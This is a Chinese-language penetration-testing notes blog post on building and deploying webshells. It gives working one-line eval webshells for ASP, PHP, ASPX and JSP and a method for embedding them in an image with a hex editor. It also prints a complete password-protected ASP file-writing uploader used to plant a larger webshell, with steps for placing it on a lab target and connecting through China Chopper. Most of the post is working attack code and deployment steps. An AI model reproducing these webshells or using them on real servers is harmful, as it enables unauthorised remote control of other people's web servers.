20、渗透测试笔记_webshell制作_20191114

1、webshell种类

  • 一句话木马
  • 小马
  • 大马
  • 打包马
  • 脱裤马
  • 等等

2、一句话木马

2.1、介绍

  • 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用

  • <%excute request("value")%>
    

2.2、工作原理

  • 黑客在注册信息的电子邮箱或者个人主页等中插入类似如下代码:

  • <%excute request("value")%>
    
  • 其中value是值,所以你可以更改自己的值,前面的request就是获取这个值

  • <%eval request(“value”)%>(现在比较多见的,而且字符少,对表单字数有限制的地方特别的使用)

  • 当知道了数据库的URL,就可以利用本地一张网页进行连接得到Webshell(不知道数据库也可以,只要知道<%eval request(“value”)%>这个文件被插入到哪一个ASP文件里面就可以了)

  • 这就被称为一句话木马,他是基于B/S架构的

2.3、常见写法

  • asp一句话木马:

    <%eval request("c")%>
    
  • php一句话木马:

    <?php @eval($_POST[value]);?>
    
  • aspx一句话木马:

    <%@ Page Language="Jscript"%>
    <%eval(Request.Item["value"])%>
    
  • jsp一句话木马:

    <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> 
    

3、小马&大马

3.1、介绍

  • 小马体积小,容易隐藏,隐蔽性强,最重要在于与图片结合一起上传之后可以利用nginx或者IIS6的解析漏洞来运行,不过功能少,一般只有上传等功能
  • 大马体积比较大,一般50k以上,功能也多,一半都包括提权命令,磁盘管理,数据库连接接口,执行命令甚至有些已具备自带提权功能和压缩,解压缩网站程序的功能。这种马隐蔽性不好,而大多代码如不加密的话很多杀毒厂商开始追杀此类程序

3.2、使用

  • 小马的使用

    主要用来上传大马

  • 大马的使用

    提权、打包、脱裤、增删文件等

4、一句话木马的制作和上传

  1. 去百度找一张图片(尽量看起来像服务器网站后台的图片)

  2. 打开C32Asm工具
    在这里插入图片描述
    3.将图片拖进工具中,选择以16进制打开
    在这里插入图片描述

  3. 拉到最下方,将一句话木马复制进图片中(可以多复制几种asp、php)
    在这里插入图片描述

  4. 制作完成后即可开始使用
    在这里插入图片描述

  5. 启动靶机的phpstudy,将制作好的木马放入网站根目录下,并将其名字改为a.php
    在这里插入图片描述

  6. 右键文件属性–>点击安全–>点击添加–>输入个对象名称–>确定
    在这里插入图片描述

  7. 点击everyone,将权限全部勾选,点击确定
    在这里插入图片描述

  8. 使用攻击机访问此文件路径
    在这里插入图片描述

  9. 打开菜刀进行连接,密码为1 (如果菜刀连接不成功可以换一张图片重新制作,大部分是选取的图片的问题)
    在这里插入图片描述
    在这里插入图片描述

5、小马的使用–上传大马

  1. 将小马复制进入靶机web目录下,小马内容如下:

    <%
    on error resume next
    %>
    <%
      if request("pass")="g" then  '在这修改密码
      session("pw")="go"
      end if
    %>
    <%if session("pw")<>"go" then %>
    <%="<center><br><form action='' method='post'>"%>
    <%="<input name='pass' type='password' size='10'> <input "%><%="type='submit' value='用力插进去'></center>"%>
    <%else%>
    <%
    set fso=server.createobject("scripting.filesystemobject")
    path=request("path")
    if path<>"" then
    data=request("da")
    set da=fso.createtextfile(path,true)
    da.write data
    if err=0 then
    %>
    <%="yes"%>
    <%else%>
    <%="no"%>
    <%
    end if
    err.clear
    end if
    da.close
    %>
    <%set da=nothing%>
    <%set fos=nothing%>
    <%="<form action='' method=post>"%>
    <%="<input type=text name=path>"%>
    <%="<br>"%>
    <%="当前文件路径:"&server.mappath(request.servervariables("script_name"))%>
    <%="<br>"%>
    <%="操作系统为:"&Request.ServerVariables("OS")%>
    <%="<br>"%>
    <%="WEB服务器版本为:"&Request.ServerVariables("SERVER_SOFTWARE")%>
    <%="<br>"%>
    <%="服务器的IP为:"&Request.ServerVariables("LOCAL_ADDR")%>
    <%="<br>"%>
    <%=""%>
    <%="<textarea name=da cols=50 rows=10 width=30></textarea>"%>
    <%="<br>"%>
    <%="<input type=submit value=save>"%>
    <%="</form>"%>
    <%end if%>
    
  2. 将x.asp复制到靶机
    在这里插入图片描述

  3. 右键文件属性–>点击安全–>点击添加–>输入个对象名称–>确定
    在这里插入图片描述

  4. 点击everyone,将权限全部勾选,点击确定
    在这里插入图片描述

  5. 访问目标地址,密码为g进入
    在这里插入图片描述
    在这里插入图片描述

  6. 进入界面后,第一个输入框输入路径,并且给大马起个名字:C:\web2.asp\xx.asp,第二个输入框输入大马(大马可以下方评论留言)
    点击save上传成功界面为
    在这里插入图片描述

  7. 访问新的上传的大马
    在这里插入图片描述

  8. 输入密码为cc2789,进入以下界面为成功
    在这里插入图片描述

6、文件包含马

  1. 木马文件内容为,引号内容为,要进行包含的木马
    在这里插入图片描述
  2. 访问文件包含马路径
    在这里插入图片描述
  3. 输入密码为cc2789,进入以下界面为成功
    在这里插入图片描述
发布了38 篇原创文章 · 获赞 135 · 访问量 2791

猜你喜欢

转载自blog.csdn.net/weixin_44023693/article/details/103072102
今日推荐